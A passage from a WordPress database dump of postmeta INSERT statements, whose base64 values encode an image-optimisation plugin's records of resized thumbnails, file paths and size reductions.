wXC8yMDE2XC8wOFwvbWlsbGVyLTEtMS1lMTQ3MTUzNDgwMTcxNy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTQ3NCwiaWQiOjIxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxlci0xLTEtZTE0NzE1MzQ4MDE3MTctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsZXItMS0xLWUxNDcxNTM0ODAxNzE3LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWlsbGVyLTEtMS1lMTQ3MTUzNDgwMTcxNy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTQ3NywiaWQiOjIxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxlci0xLTEtZTE0NzE1MzQ4MDE3MTctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsZXItMS0xLWUxNDcxNTM0ODAxNzE3LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWlsbGVyLTEtMS1lMTQ3MTUzNDgwMTcxNy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTQ3OSwiaWQiOjIxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxlci0xLTEtZTE0NzE1MzQ4MDE3MTctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsZXItMS0xLWUxNDcxNTM0ODAxNzE3LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWlsbGVyLTEtMS1lMTQ3MTUzNDgwMTcxNy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTQ4MiwiaWQiOjIxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGxlci0xLTEtZTE0NzE1MzQ4MDE3MTctNjAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxsZXItMS0xLWUxNDcxNTM0ODAxNzE3LTYwMHg0MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbWlsbGVyLTEtMS1lMTQ3MTUzNDgwMTcxNy02MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTQ4NCwiaWQiOjIxOH1d'); 
INSERT INTO `wp_postmeta` VALUES (30317, 211, 'wpfc_optimisation_reduction', '18276'); 
INSERT INTO `wp_postmeta` VALUES (30318, 211, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQ2LTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi5qcGciLCJ3aWR0aCI6MzU1LCJoZWlnaHQiOjI0NSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Fib3V0Ni0yLmpwZyIsInJlZHVjdGlvbiI6MTgyNjgsInRpbWUiOjE0ODM1ODk0OTIsImlkIjoiMjExIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0zNDB4MjQ1LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjQ1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTM0MHgyNDUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ2LTItMzQweDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk0OTQsImlkIjoyMTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQ2LTItMjUweDI0NS5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI0NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0yNTB4MjQ1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Fib3V0Ni0yLTI1MHgyNDUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NDk2LCJpZCI6MjExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQ2LTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hYm91dDYtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTQ5OCwiaWQiOjIxMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ2LTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MDAsImlkIjoyMTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ2LTItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MDIsImlkIjoyMTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ2LTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MDUsImlkIjoyMTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0yNDd4MjQ1LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTI0N3gyNDUuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ2LTItMjQ3eDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MDcsImlkIjoyMTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDYtMi0zMDB4MjQ1LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Ni0yLTMwMHgyNDUuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ2LTItMzAweDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MDksImlkIjoyMTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30319, 210, 'wpfc_optimisation_reduction', '18950'); 
INSERT INTO `wp_postmeta` VALUES (30320, 210, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQ1LTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi5qcGciLCJ3aWR0aCI6MzU1LCJoZWlnaHQiOjI0NSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Fib3V0NS0yLmpwZyIsInJlZHVjdGlvbiI6MTg5NDIsInRpbWUiOjE0ODM1ODk1MTYsImlkIjoiMjEwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0zNDB4MjQ1LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjQ1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTM0MHgyNDUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ1LTItMzQweDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MTgsImlkIjoyMTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQ1LTItMjUweDI0NS5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI0NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0yNTB4MjQ1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Fib3V0NS0yLTI1MHgyNDUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NTIwLCJpZCI6MjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQ1LTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hYm91dDUtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTUyMywiaWQiOjIxMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ1LTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MjUsImlkIjoyMTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ1LTItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MjcsImlkIjoyMTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ1LTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MjksImlkIjoyMTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0yNDd4MjQ1LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTI0N3gyNDUuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ1LTItMjQ3eDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MzEsImlkIjoyMTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDUtMi0zMDB4MjQ1LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0NS0yLTMwMHgyNDUuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQ1LTItMzAweDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1MzMsImlkIjoyMTB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30321, 209, 'wpfc_optimisation_reduction', '17572'); 
INSERT INTO `wp_postmeta` VALUES (30322, 209, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQyLTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDItMi5qcGciLCJ3aWR0aCI6MzU1LCJoZWlnaHQiOjI0NSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Fib3V0Mi0yLmpwZyIsInJlZHVjdGlvbiI6MTc1NjQsInRpbWUiOjE0ODM1ODk1NDAsImlkIjoiMjA5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDItMi0zNDB4MjQ1LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjQ1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Mi0yLTM0MHgyNDUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQyLTItMzQweDI0NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1NDMsImlkIjoyMDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQyLTItMjUweDI0NS5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI0NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDItMi0yNTB4MjQ1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2Fib3V0Mi0yLTI1MHgyNDUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5NTQ1LCJpZCI6MjA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Mi0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvYWJvdXQyLTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9hYm91dDItMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTU0NywiaWQiOjIwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDItMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Mi0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvYWJvdXQyLTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODk1NTAsImlkIjoyMDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9hYm91dDItMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2Fib3V0Mi0yLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1Ym